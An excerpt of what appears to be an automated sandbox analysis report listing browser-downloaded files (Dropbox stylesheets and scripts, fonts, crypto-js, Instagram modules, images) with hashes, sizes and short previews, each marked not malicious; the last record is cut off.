                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/spectrum/index.web-vflwvsegv.css
                                                                        Preview:/*! @generated -- DO NOT MODIFY */../* -- avatar/index.web.css */..mc-avatar-initials-16 {. font-weight: 600;. font-size: 9px;. line-height: 16px;.}..mc-avatar-initials-24 {. font-weight: 500;. font-size: 11px;. line-height: 24px;.}..mc-avatar-initials-32 {. font-weight: 600;. font-size: 13px;.}..mc-avatar-initials-40 {. font-weight: 800;. font-size: 16px;.}..mc-avatar-initials-48 {. font-weight: 700;. font-size: 19px;.}..mc-avatar-initials-56 {. font-weight: 700;. font-size: 22px;.}..mc-avatar-text {. display: -ms-flexbox;. display: flex;. -ms-flex-pack: center;. justify-content: center;. -ms-flex-align: center;. align-items: center;. border-radius: 50%;. color: var(--dig-color__secondary__on-base, #fff);.}..mc-avatar-text-inactive {. opacity: 0.5;. filter: grayscale(1);.}..mc-avatar {. display: inline-block;. vertical-align: middle;. border-radius: 50%;. overflow: hidden;. outline: 0;.}..mc-avatar-
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):96
                                                                        Entropy (8bit):5.348398599884025
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:1078B9434AEAE5FDB55774FA61170266
                                                                        SHA1:23F6F65F314ED566B6083318D0DADC19BBFAE883
                                                                        SHA-256:8471EEFC2B8034A2E81BE1681B2BAD82C0D5C0C92E5386B176AEF9ACA15D6E9B
                                                                        SHA-512:AAE247ED215EDD5AE19AC643E7398971FAB768B2BD60F429C0BAB80EE47FD7D5CF1972EA8169CD2E7AC6BD7C82DC0A9682F6A5917215F4687CA899033D65EC1F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://fp.dropbox.com/CrbU/a8tlQRW/kdnryYu/iOjwI?q=hSrgVEjs3amxLolocQ18
                                                                        Preview:keSYRN6zx4CAoIkn1YiXqNIzyoW5XELTGRemWp1ClYCB0zV2N7B+xNkIfOnpIPIIyGSDInDbr4biPL+w8gm26mZNLiNPGQ==
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (469)
                                                                        Category:downloaded
                                                                        Size (bytes):470
                                                                        Entropy (8bit):4.6289612247409035
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:3CDC1DC6479A0E2048BBB4BF35194524
                                                                        SHA1:B5837404FB7ABCC60DB07CC14F96BDF31DE3FB89
                                                                        SHA-256:06EA285779BCD40A8E1B53D86D5A89E7C64728A934FB356D17ECC15C7513A56D
                                                                        SHA-512:0724455B336C78DB801E6355F05C55284E4EC5DBBC83D23F01FFF555A34B1059AAD2D270EEE28D4708026614D9DB5F8A9237CBF3EB7EBC29C58D7B26AB8FDD7E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/account/emails-vflPNwdxk.css
                                                                        Preview:.change-email-modal--maestro .db-modal .db-modal-title{text-align:center;margin-top:var(--spacing__unit--2);color:var(--dig-color__text__base)}.change-email-modal--maestro .db-modal .db-modal-content{background:var(--dig-color__background__base);margin:0 56px}.change-email-modal--maestro .db-modal .db-modal-content .db-modal-buttons{background:var(--dig-color__background__base);border-top:none;margin-bottom:var(--spacing__unit--3);padding:var(--spacing__unit--2) 0}.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (928)
                                                                        Category:downloaded
                                                                        Size (bytes):1292
                                                                        Entropy (8bit):5.3406499534574055
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A473CDFC6C8CA01DDF1AAA1DBFC27E2D
                                                                        SHA1:A260D218FEC34B5471AC232F8831C4484D28B0AC
                                                                        SHA-256:06BF49624D463F74D3D792E1CDE5BEC56847F5C142D468E59A9AC90F4BA9A0A5
                                                                        SHA-512:63481E8AB5EF854848C3DF02879F4003D4A5B9352274BB6D78DAAB2C93E03719A1E27EBE29A9DF8CA4EB7565D5108601C7F946750235D625A47AB81B79601469
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_ui_image-vflpHPN_G.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="95b9b5df-2a30-32a6-a3a2-278c705ff8bf")}catch(e){}}();.define(["exports","react","./e_core_exception"],(function(e,s,t){"use strict";function i(e){return e&&e.__esModule?e:{default:e}}var r=i(s);const n={};function a(e){-1!==e.indexOf("-vfl")||(e=>0===e.indexOf("https://assets.dropbox.com"))(e)||null!=n[e]||(n[e]=!0,t.reportStack(`Non-VFL path detected: ${e}. This usually means that the image doesn't exist and is 404ing; though another possibility is that the image exists but vfl cache busting isn't being applied, which can happen when the url is a relative url, since we generally don't vfl relative urls.`))}class o extends r.default.Component{render(){let e;a(this.props.src),this.props.src.endsWith(".svg")||!this.props.srcHiRes?e=this.props.src:(a(this.props.srcHiRes),e=this.pr
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 86404, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):86404
                                                                        Entropy (8bit):7.997550567294311
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:6FF72A8066505BF68A02551C27EF4E49
                                                                        SHA1:5F7BEEC0EE4C210DB8E9339A8B98745B3F223AC6
                                                                        SHA-256:C9B2E1944C0C69D696B74B0E42396F0ABFACEB74FFBF21E5276ECA6F1484E95B
                                                                        SHA-512:B5A8F48E4219717BBA707F7EEE054E6182082F73960F217840C93312885B57C55AF25C250CA42DF9FE6130AA25A2A4583D97F61A1E4D0AEDBBB667BD0BD2BC1C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/fonts/AtlasGrotesk-MediumItalic-190618-Web.woff2
                                                                        Preview:wOF2......Q...........Q"...........................x..d.`....<..s.....D.....4..6.$..d. ........Z[.x...2...$...j.S..+..k........&.u..c.C..?C.........c...v..........."rsw..v..S.J......F1....$.<.kZ1..n./.]65.....WJ..4....T.n.F..GDC......9H.....Z..l)...~Pf.h.!r.Dhx..C..-...\.<.$b..rWT>le.vI.J...3..q.==.T...RJ .8+..*...|.^.j~..W)..B2......Vr..YSE...b...HB...?..r-...R..w.$]I..~t.+..g&.Ig.Qq.Rj.[.T...}..djkB?.I..f....1.d..h*.rd_..]7_xJH.^.}........ ..,l..`x..*.l.YY.mU.=.8.......$I...|....2m.g~wL}....u........H.#..._.I.T...P.&3.bxcWY..* _.8...<.._...r..f)..SY.,...9uR....B.BDa}L..z.8cV..n...[.....~{Xn...\]..mS..T....7.....n..,..w.TE$H.'.@&}.w8<..ED.f|..y(.........d*Lg.....(.UUu...n....8v..v....=..q.....:., ..........'....a.....+.~.,..D0.j1.F.&C.0.+/T4.;s.=. .._.Z.......96.Z.[.(.fl.`..1F.............W.z..........fL...i.=.....1.@0jbb....0.3.."...o......~g.....?.%5.``.Q...i..E.`.a<...h...OI..@.&..?....~.....q.`..g..FFZFZFZZZZJJJJJ".H$..D".....y...{.ut:...D.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65271)
                                                                        Category:downloaded
                                                                        Size (bytes):67212
                                                                        Entropy (8bit):5.587922338228059
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E8591BD54BE0B303E0249CD1FBFD333B
                                                                        SHA1:3B3A6B96FBAF335BB5EB2D0354A44A153ABAA639
                                                                        SHA-256:98B96958CB9348B28903CCF654588004BA4670466835546459508B826778835B
                                                                        SHA-512:BD2216E2277D392848FB86ABDE6796E169EF5D8C65A35F8EDB0AEED53C481B647C116EB82D4F9E051407B9E03BBBF1EAB16C2A3CC65EF315993797A0EC8B9236
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_core_i18n-vfl6Fkb1U.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="5425592c-c68e-39f0-97af-e7148accb669")}catch(e){}}();.define(["exports","./e_core_exception","./c_src_sink_index","./c_api_v2_routes_user_metadata_provider","metaserver/static/js/langpack","react","./c_lodash"],(function(t,e,r,n,o,i,a){"use strict";function s(t){if(t&&t.__esModule)return t;var e=Object.create(null);return t&&Object.keys(t).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(t,r);Object.defineProperty(e,r,n.get?n:{enumerable:!0,get:function(){return t[r]}})}})),e.default=t,Object.freeze(e)}var l=s(o),c=s(i),u=function(t,e){return u=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},u(t,e)};var h=function(){return h=Object
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):661
                                                                        Entropy (8bit):5.129341069954787
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:9067859A55F8C3BA9411E359AEDAEE5A
                                                                        SHA1:D0B845A155676462C2D3FF60616E5057B3C6CE0C
                                                                        SHA-256:998169C92E5A694A77E31ED1866BA8EFF894C2A604ED244C03973876AC1796B6
                                                                        SHA-512:82D11179E0CB856EEE2086332F6859943AE37B2A9076BD331DA7D1CCFA12E525820D8D23B878D09EE41D09D60358C6392CD1BC05E26015707AE896C1D261B637
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/index.web-vflkGeFml.css
                                                                        Preview:@import url('./components-vflWHv-Cs.css');./* This loads **after** `components.css` because it contains all the legacy color tokens */.@import url('./legacy-token-migration-vfl1sMmEL.css');.@import url('./logos-vflprtpOP.css');.@import url('./icons-vfl_2f8Dj.css');.@import url('./foundations-tokens-vflkwo9I6.css');.@import url('./foundations-components-vflVZfKma.css');.@import url('./content-icons-vfliRJDVx.css');./* For any images that are circle cropped, scale them up a bit so that they're still cropped as a squircle */..dig-Avatar-image--modern[src*='circle_crop=1'],..dig-Avatar-image--modern[srcset*='circle_crop=1'] {. transform: scale(1.075);.}.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):48316
                                                                        Entropy (8bit):5.6346993394709
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:2CA03AD87885AB983541092B87ADB299
                                                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 168708
                                                                        Category:dropped
                                                                        Size (bytes):42334
                                                                        Entropy (8bit):7.993652933476571
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:C6FBC6D064613ECC3078FF39B40A94D0
                                                                        SHA1:967E27E6F88B371B42435336AAB1C0C4B8CE33A2
                                                                        SHA-256:45FFC326D77971444FB19003F58623EF3188F96144BFB88D2C4FE2325002F144
                                                                        SHA-512:CA7910D5C5DC4D5B2CC30CD8EE9A3561B6D58D5BA817C538C5C37785428F6559060F14168EB4FBB0F8FA43BCC8695F167BFAD28978D170AFDA77A63469B1367E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:............v. .....3:.1...Yn./U.+o;.Y{..r.E.b%..H*..[..?..Yk.z.O...?9_2+".. HY...=.S.Y..K .....7......7..._...g..O~.......G.?<\^y..".....<....u$B..W.c!....8Y...d..HL...../A6.....,W.D.G...g..d._.......\....N.w..r.3...............7.].e..y.g. ...u..0......w...B..(.......h...=..y6|..&....8.=.3....Y"..<..[../.`.'Y...F?.4..1l.....J^Fc.2>|z......g.......g..??k.S*a..E..Y.F...}..v.;!...8w"..G.+..9.~.}.&..ws...w...{.g.C..4...x.}.,>.n... .e..4..z.)...h.~.~.&.(.n......MS.....r..7..<K..|.......0a...b...Q4q3.....t....?..Q.....W....e.}..!..._.+7.X..4.Q.D..b.I..IH...7.j^7.r.....u...q...X.[>M.[....a...0...!.8CG$.,..&... .O.q.7.'..Z..H..../.......0g0.p...F.).>..>.....n...F.,.{./..+|...."Wt?.;&.Az..3.....c$>'..........ws@r.%.;..+./.s...l.M|...nv......dwb.".i.')t..I.@..*W.F.,a.7..M.UUS*.|i.E...[...5.K.<:.\m$..c:.....r..s...q..&?K.$u..@.$o..8n..q.dY;..A.@=.t.7...m...n}.7...1.7.t$67.%d..FY.....u.}....F..u..D7.....9Hs...N...i..o...5.,0.Hp`\<..\.2$..[.....s.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):497
                                                                        Entropy (8bit):7.471761176000909
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:EC2E6E18A914B2BAE990F7CC9F8CD4DD
                                                                        SHA1:33E2B67E19BB8C21E4C36902316E0B00F7FA6017
                                                                        SHA-256:C0BCE318A2ABA982ED09E4C18146D93CB202B71AF00FC0764FF794742D83853C
                                                                        SHA-512:5727FFEDC630901DB996A97AE7964793E780B3663D37AB5ED0FAD7FEBC9EFF5F198C55D98E21F6DDA8AA934E6883CCE1E6DC4868C5E31057852C75C6B6E2800B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/img/favicon/favicon-32.png
                                                                        Preview:.PNG........IHDR... ... .....szz.....IDATx..GCQ...2Z.BP...JH...Z(.B.-@IK.B...& ....@...d..A..%v:.c0.k.}....w...{..C9.4a....F.\6.d...K..(...K3l........0...o.I@M.=.v=..B.'.^.8.!..f~!..z]..V..l..CD...4.i...&.5.....1...|Gq...^..`......3.......x.....Q...Q....8......E$.u3..~j.A-z...n.qG...\9......C(..j.#.o..C.z.w],...-.t..v..^.F.....S.z.....7...ly.":..4...]}...e4......../.... ..../........P..3.."9.H:...te...b..)x...lt3.7.XA...byo.w..2F.....W....}...:..)..TQ5.....IEND.B`.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2942)
                                                                        Category:dropped
                                                                        Size (bytes):3337
                                                                        Entropy (8bit):5.299463834986636
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:DDF689E5DF1BDB10AE1FC2BB9329A732
                                                                        SHA1:239EFDBD6ACA86A4706697BB4B85304EEFCE9D6F
                                                                        SHA-256:1CE8220865E82FC0CB9F38B6345827A2B0920E0CDC0177FD5D4FDCE1D4C4AD0C
                                                                        SHA-512:A11C879C9377BD43C50BAA01A64063277683D3E26DEE379F951A3C24541A1B704D240793C60F36BCE2F47DE1A315653FB9CEB1A624B8644982E2C1EB3AD58D09
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="2ff95dae-af8c-333d-8660-a473c85f481a")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function c(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(c){if("default"!==c){var n=Object.getOwnPropertyDescriptor(e,c);Object.defineProperty(t,c,n.get?n:{enumerable:!0,get:function(){return e[c]}})}})),t.default=e,Object.freeze(t)}var n=c(t);e.LibraryLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M9.5 9.5H15V11H9.5V9.5Z",fill:"currentColor",vectorEffect:"non-suserng-stroke"}),n.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M6 6.25V17.5c0 .85.2 1.465.62 1.88.415.42 1.03.62 1.88.62h10v-1.5h-10c-.4 0-.705-.065-.825-.185-.11-.11-.175-.41-.175-.815 0-.405.0
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (25748)
                                                                        Category:downloaded
                                                                        Size (bytes):25749
                                                                        Entropy (8bit):5.133241989805827
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F45BC76720B514872ACED161702CB2E9
                                                                        SHA1:8FE71D82FA0C6D4756C23809F8D2A9DDBA5DBBDC
                                                                        SHA-256:EC0A1165048EC15A5A97DB19D428D8C8103896E21B718D6D215CD8C3D9884E79
                                                                        SHA-512:B9E6C0EE94A179A5DC53532CE17D1AA7E3C130A090E110118772A7510F3A94B4AB46A75858397C9811C93A36854EE6993A35817EB5E2F1E88819A927CA829067
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/sharing/shared_folder_invitation_signup_page-vfl9FvHZy.css
                                                                        Preview:@font-face{font-family:'AtlasGrotesk';src:url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Thin-Web-vflugmAly.woff2") format("woff2"),url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Thin-Web-vflWr14lv.woff") format("woff"),url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Thin-Web-vflYSEsbG.ttf") format("truetype");font-weight:100;font-style:normal}@font-face{font-family:'AtlasGrotesk';src:url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-ThinItalic-Web-vflP-manv.woff2") format("woff2"),url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-ThinItalic-Web-vflmKWqdQ.woff") format("woff"),url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-ThinItalic-Web-vflHYkDrv.ttf") format("truetype");font-weight:100;font-style:italic}@font-face{font-family:'AtlasGrotesk';src:url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Light-Web-vflvAXMid.woff2") format("woff2"),url("
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (11205)
                                                                        Category:dropped
                                                                        Size (bytes):276881
                                                                        Entropy (8bit):5.617667694988547
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:3C417E96BA02AF3F3CD3A82F2EB63826
                                                                        SHA1:A9E6FAF7BD238E36589DBD6F0A1E2340000B2BFF
                                                                        SHA-256:8DF25047EEE73D93BADF1AF15A435ECD018165A94A5274EA40DA46503955B377
                                                                        SHA-512:D0DB314E3A3078548CFBE5DE6B77E33121F4698C9FF806B14074EF1791694A46F8EA089544E79371247DBF4FF0DAAFBFA6C4B318F6A4CDD5365563B5FD77CC02
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:;/*FB_PKG_DELIM*/..__d("AsyncTypedRequest",["AsyncRequest"],(function(a,b,c,d,e,f,g){"use strict";a=function(a){babelHelpers.inheritsLoose(b,a);function b(b){b=a.call(this,b)||this;b.setReplaceTransportMarkers();return b}var c=b.prototype;c.promisePayload=function(b){return a.prototype.promisePayload.call(this,b)};c.setPayloadHandler=function(b){a.prototype.setPayloadHandler.call(this,b);return this};return b}(c("AsyncRequest"));g["default"]=a}),98);.__d("BaseToastContentWrapper.react",["BaseTheme.react","BaseView.react","react","useCurrentDisplayMode"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||d("react"),j={dark:"__fb-dark-mode ",light:"__fb-light-mode ",type:"CLASSNAMES"};b=i.forwardRef(a);function a(a,b){var d=a.children,e=a.testid;e=a.useInvertedDisplayMode;a=a.xstyle;var f=c("useCurrentDisplayMode")();f=f==="dark"?"light":"dark";return e?i.jsx(c("BaseTheme.react"),{config:j,displayMode:f,ref:b,testid:void 0,xstyle:a,children:d}):i.jsx(c("BaseView.react"),{ref:b,testid:void
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (6105)
                                                                        Category:dropped
                                                                        Size (bytes):46050
                                                                        Entropy (8bit):5.548480932308434
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A1D784564270A62C255DDAC04A9F5DF3
                                                                        SHA1:717FE16663CAEB82A4FC06341E8A644F6D00EEFF
                                                                        SHA-256:5C7971A88ACC90017DE5B083797FA3BEBAF90219C9652CADB55A11A80760EFF4
                                                                        SHA-512:4B435DDBE4AD9A1FC3C302A0CC83573C2A7D65CFB0947E1FF2CABA7520C611B7754D8FEEA466E302757DD17141C9CC5EAC4D166C488E9C325291FA8ACA7CC33F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:;/*FB_PKG_DELIM*/..__d("BaseTooltipContainer.react",["react","stylex"],(function(a,b,c,d,e,f,g){"use strict";var h,i,j=i||d("react"),k={container:{backgroundColor:"xj5tmjb",borderTopStartRadius:"x1r9drvm",borderTopEndRadius:"x16aqbuh",borderBottomEndRadius:"x9rzwcf",borderBottomStartRadius:"xjkqk3g",boxShadow:"xms15q0",display:"x1lliihq",filter:"xo8ld3r",marginBottom:"xjpr12u",marginTop:"xr9ek0c",maxWidth:"x86nfjv",opacity:"xg01cxk",paddingTop:"xz9dl7a",paddingBottom:"xsag5q8",paddingStart:"x1ye3gou",paddingEnd:"xn6708d",position:"x1n2onr6",transitionDuration:"x1ebt8du",transitionProperty:"x19991ni",transitionTimingFunction:"x1dhq9h",$$css:!0},containerVisible:{opacity:"x1hc1fzr",transitionDuration:"xhb22t3",transitionTimingFunction:"xls3em1",$$css:!0}};b=j.forwardRef(a);function a(a,b){var d=a.children,e=a.id,f=a.shouldFadeIn;f=f===void 0?!1:f;var g=a.xstyle,i=a.role;i=i===void 0?"tooltip":i;a=babelHelpers.objectWithoutPropertiesLoose(a,["children","id","shouldFadeIn","xstyle","role"]
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (8477)
                                                                        Category:downloaded
                                                                        Size (bytes):648676
                                                                        Entropy (8bit):5.514312436479981
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E5D9A9BCED5759A4D170E167BE77AB89
                                                                        SHA1:94B7973C2B1499A1E08F6BB11CE7BB106D88D7F1
                                                                        SHA-256:05811DDBFA61A126D77DD44045D19365664F612A21534AD03CE51F7524810D15
                                                                        SHA-512:707836E0C1A9EE29E1F9A1DE16ECEF9A824D499E250928F7BAD1D974DF2B6F8CB9BAEBEB3D660D09E8671BE850048584D1851E946731E7C8E89BCB4CFF731263
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://static.cdninstagram.com/rsrc.php/v3i6ja4/yk/l/en_US/8QQb861sah1.js?_nc_x=Ij3Wp8lg5Kz
                                                                        Preview:;/*FB_PKG_DELIM*/..__d("AccessibilityWebAssistiveTechTypedLoggerLite",["generateLiteTypedLogger"],(function(a,b,c,d,e,f){"use strict";e.exports=b("generateLiteTypedLogger")("logger:AccessibilityWebAssistiveTechLoggerConfig")}),null);.__d("AggregateError",[],(function(a,b,c,d,e,f){"use strict";a=function(a){babelHelpers.inheritsLoose(b,a);function b(c,d){var e;d=(d=d)!=null?d:g(c);e=a.call(this,d)||this;e.name="AggregateError";e.errors=c;e.message=d;Error.captureStackTrace&&Error.captureStackTrace(babelHelpers.assertThisInitialized(e),b);return e}return b}(babelHelpers.wrapNativeSuper(Error));function g(a){if(a.length===0)return"No errors";return a.length===1?a[0].message:a.map(function(a){return"- "+a.message}).join("\n")}f["default"]=a}),66);.__d("BDSignalBufferData",[],(function(a,b,c,d,e,f){"use strict";a={};b=a;f["default"]=b}),66);.__d("SignalValueContext",[],(function(a,b,c,d,e,f){"use strict";a=function(){function a(a){this.cn=a}var b=a.prototype;b.getSignalValueContextName=func
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (623)
                                                                        Category:downloaded
                                                                        Size (bytes):683
                                                                        Entropy (8bit):4.875457368925568
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:B8BE0AEA05D076DD5B710F6DED7565B0
                                                                        SHA1:65F0CF4F7D35B7EC22F2E244A11A30E39BEF57BD
                                                                        SHA-256:6437CDA00E26052D776AFE662A06DDF8FE9981DD79AB0F9D3F2360D694AC319E
                                                                        SHA-512:B2A2678876762FA27E335FEC289E095F239F689690DC21A4BEBDD90D96DA791BBB9CEED3491792FF4ACE318FB0D2B2824CDF2F18FB89C35737CA79B496579BAC
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/js/signup_signin/unified_susi/third_party/third_party_auth.module.out-vfluL4K6g.css
                                                                        Preview::root{--kakao-color:#fee500;--kakao-hover-color:#fada0a;--kakao-active-color:#f2d00f;--kakao-disabled-color:#eee}._sign-in-with-google-button-register_brn4n_8{margin-top:16px}._third-party-container_brn4n_12{display:flex;flex-direction:column;gap:var(--dwg-spacing__unit--2)}._disable-google-button_brn4n_18{opacity:.5;pointer-events:none}._kakao-button_brn4n_23{background-color:var(--kakao-color)}._kakao-button_brn4n_23:hover{background-color:var(--kakao-hover-color)}._kakao-button_brn4n_23:active{background-color:var(--kakao-active-color)}._kakao-button_brn4n_23:disabled{background-color:var(--kakao-disabled-color)}./*# sourceMappingURL=third_party_auth.module.out.css.map */
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 176 x 181, 8-bit colormap, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):6161
                                                                        Entropy (8bit):7.761452289722979
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:09BF84FC0DA7825FD0E2BA864BB61417
                                                                        SHA1:9C1748E1EB1E4CCB9F4CEC815223BBBB90739B23
                                                                        SHA-256:97C7D938E84019671450F73A8299B7EEDEE3657F495D3924B43BF01591323668
                                                                        SHA-512:3FE8F6B233AC8B94C55DABED129F21A03D2800FAD9C01DFCA7C6A33870A97B36CEB1DD74AFBC19FC057B99BB39B9DC627C66F49E0E50272C4897BE94DF929786
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://static.cdninstagram.com/rsrc.php/v3/yv/r/KoLLpWDb4f6.png
                                                                        Preview:.PNG........IHDR....................PLTEGpL&&&............'''........(((&&&'''+++,,,&&&&&&...'''&&&...999......&&&......&&&''''''...'''...............000...))),,,&&&......&&&..............................&&&'''...<<<...&&&.........///.........'''...'''&&&&&&...&&&......***.........)))...'''...(((...&&&.........888......'''..................(((......&&&............'''......&&&.........***.........'''&&&............'''...'''...'''......'''...'''&&&......'''..................&&&......)))***.........&&&'''...&&&'''...)))...'''......&&&...'''...''''''....................................'''......'''......&&&((('''...'''...............'''...'''........................'''.....................***'''.......................................&&&.........&&&..................&&&...........................@..K....tRNS..........Y.."...............hh..)............8....F......Gr...(.e..q...6u.."35&&,,...m.........m8...... Z.kS.00...DH.....f..a...{T.Xw!...}..d..(cyM...NV..26..r..Q;C...{.$..$..nZ
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (35715)
                                                                        Category:downloaded
                                                                        Size (bytes):84517
                                                                        Entropy (8bit):5.339877205588964
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:AAECFB491EEE204A4A4289FC73BDA6EA
                                                                        SHA1:ABC0A5B3A30C9CAA841F080D7ED1801E9584ACCE
